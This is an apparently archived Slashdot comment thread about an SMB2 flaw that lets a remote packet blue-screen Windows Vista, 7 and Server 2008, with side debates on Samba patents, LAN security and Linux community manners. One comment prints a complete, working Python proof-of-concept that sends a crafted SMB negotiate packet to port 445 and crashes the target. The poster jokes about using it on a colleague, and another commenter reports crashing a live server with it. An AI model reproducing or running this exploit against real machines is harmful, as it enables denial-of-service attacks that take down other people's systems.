Windows 7 Reintroduces Remote BSoD 427
David Gerard writes "Remember the good old days of the 1990s, when you could teardrop attack any Windows user who'd annoyed you and bluescreen them? Microsoft reintroduces this popular feature in Windows 7, courtesy the rewritten TCP/IP and SMB2 stacks. Well done, guys! Another one for the Windows 7 Drinking Game."
Re:Pretty nice (Score:2, Informative)
Correction! (Score:5, Informative)
I was terribly unfair to Microsoft in the story summary (which is pretty much what I wrote) - per TFA, this flaw is actually an exciting new feature of Vista, not of Windows 7.
And before anyone says "but Win7 is beta!" - this flaw is present in the gold master.
Re:Correction! (Score:4, Informative)
For all who want a more technical summary of TFA: (Score:5, Informative)
The exploit (which is actually ridiculously simple) goes as follows:
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: -->
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
Current problem solution: disable the SMB protocol on your infrastructure..
Now please excuse me, I have go and play a bit with our network admin..
Re:IP Reasons for SMB2 (Score:3, Informative)
No, it won't. The specs are right here [microsoft.com].
Re:Local? (Score:2, Informative)
Re:IP Reasons for SMB2 (Score:3, Informative)
Probably not technical problems, but maybe legal ones. See that paragraph about patents? Neither the Open Specification Promis nor the Community Promise (both linked) cover SMB2.
Re:IP Reasons for SMB2 (Score:5, Informative)
No, it won't. The specs are right here [microsoft.com].
"No, it won't" what? Possibly spell problems for the Samba team? From your link:
Patents. Microsoft has patents that may cover your implementations of the technologies described in the Open Specifications. Neither this notice nor Microsoft's delivery of the documentation grants any licenses under those or any other Microsoft patents. However, a given Open Specification may be covered by Microsoft's Open Specification Promise (available here: http://www.microsoft.com/interop/osp [microsoft.com]) or the Community Promise (available here: http://www.microsoft.com/interop/cp/default.mspx [microsoft.com]). If you would prefer a written license, or if the technologies described in the Open Specifications are not covered by the Open Specifications Promise or Community Promise, as applicable, patent licenses are available by contacting iplg@microsoft.com ...
Emphasis mine. So I'll correct myself, it may spell trouble for the Samba team. It's not clear. Which is essentially what I said. Do you really think iplg@microsoft.com will grant the Samba team a written license or possibly a patent license?
Why do they use the ambiguous language quoted above if this is an open technology I'm not suppose to fear implementing? I mean, haven't we been threatened over this sort of thing before [slashdot.org]? It's not clear to me why Microsoft stops other products from interfacing with theirs (product lock in?) but I'm not about to give them the benefit of the doubt.
Re:Woo! (Score:3, Informative)
Re:Not consistent (Score:5, Informative)
Re:Please grow up, you're driving us away (Score:2, Informative)
Yes, use Windows because none of that ever happens. [electronista.com]
Great strawman argument, btw. We should ignore vulnerabilities in microsoft software because some precious flowers don't want their sensibilities offended.
Re:Please grow up, you're driving us away (Score:4, Informative)
Re:Please grow up, you're driving us away (Score:1, Informative)
Dear User. It's a shame you cannot join linux community. We will be missing you and your valuable posts including:
1) Your thoughts on what should be fixed in 'linux'
2) Numerous (yet not very useful) descriptions of problems you encountered with 'linux' and demands to fix them
3) Comparing 'linux' to windows every time a new ubuntu or windows release is out
4) Screenshots of your desktop & stories about your friends seeing you use 'linux'
Re:Local? (Score:5, Informative)
Comment removed (Score:5, Informative)
Re:Local? (Score:3, Informative)
"but generally speaking you're not expecting attacks from inside your LAN"
Right, because a virus on my local network would never take advantage of that.
Right, because more than 60% of data loss events are triggered by insiders.
Right, because you personally know and trust every user on your LAN.
Right, because nobody would connect an unapproved device, like their iPod, or personal PC, to the LAN.
If you're not expecting most of your attacks from inside your LAN then you're just fooling yourself.
Re:Local? (Score:1, Informative)
You know, some of us work at multi-national corporations/firms that have offices in other countries. Should someone had access to the network by some means, they could crash a company's machines from halfway around the world since they are all on the same LAN...
What did it cost you to run cables 50,000 miles between your offices, and how did you get over the latency? Further to that, isn't your IT/Info-Sec group afraid of someone putting a listener on those cables?
Any place I know of with remote/satellite offices (including my own) uses WAN or VPN, where (due to separate subnets and proper routing) one member-LAN can't take down the other member-LAN halfway across the world with a simple ping-flood, netbios, or SMB attack.
Most modern offices these days even go so far as having each floor, or even department, on different physical networks, separate from each other.
Re:I knew Windows 7 was too good to be true (Score:3, Informative)
I'll bite.
Theologically speaking, it's not to avoid "Allah feeling threatened and insecure".
The rug maker is just insuring himself that he won't fall to pride and hubris.
Windows 2008 is very vulnerable. (Score:2, Informative)
Me and my coworker tried this on an updated Windows 2008 today and none of us could believe what happened. The server just dies mid-air and throws a proud BSOD.
Am i the only one surprised something like this could slip through all the supposed testing done by Microsoft? Have they even ran a fuzzer against their code at all? If blatantly obvious holes like this goes unseen in the new TCP/IP SMB2 code rest assured a whole slew of new holes will be found later.
Funniest thing is that this dont affects XP while Microsoft touts Windows 7/2008 as the safest os ever. I guess its all marketing and just blatantly nothing done about security other than to blame everything on the user by passing every security decission onto the user with UAC.
Re:Local? (Score:3, Informative)
If it works with IPv6 then a malicious site can have IPv6 address. When the user visits the site the code reads the source IP and implements the attack.
This is why in a properly configured network you can limit SMB to within your network, by use of a firewall. With IPv6 a firewall is pretty much mandatory. If you need to file share outside your network, then using something like webdav in HTTPS mode is probably better, since this helps make it clear that you are not within your network.
Actually thinking about it, it would be cool if there was a way to change the icon of the server to indicate that it is outside your network (based on the subnet mask or something of the sorts).
Idiot (Score:4, Informative)
Re:Local? (Score:3, Informative)
I can see it being used multiple times to dereference multiple kernel pointers, but i can't see how you would get it execute code. I suppose its a question of how much damage you can do dereferencing stuff inside the kernel vs how much protection the NT has against this stuff.
On linux a few well placed dereferences and you could probably disable the firewall then run anything in effective root (by removing all security checks), ofc to do damage you would still need a second exploit on an already running process (including those that were protected) to make use of this.
Anonymous Coward is a Twitter SockPuppet (Score:2, Informative)
Re:Please grow up, you're driving us away (Score:3, Informative)
I cannot join in with the Linux community because of you people. You're just *too awful*.Instead of accepting that this stuff happens and it's bad, you childishly nerdsnort and start writing Microsoft with a dollar sign instead of an S, acting as if this stuff is some amazing manifestation of idiocy rather than a likely consequence of using a mainstream OS developed with time and budgetary constraints. It's going to have stupid bugs. Get the fuck over it.
I would like to join in with the Linux community, but all I ever hear is this pathetic nyerr-nyerr-nyerr garbage.
I do agree with a lot of things that you said, except for the main point. If you are truly the mature adult here you should be able to use the best tool for the job even if others who use it act like complete idiots. Most of the people you speak of aren't the ones doing hard core Linux development. There are some very brilliant, mature, and overall decent individuals in the Open Source Community. Heck if you really want to help, bring your Software Engineering skills and your open mindedness to the community. You'll help it grow in two ways!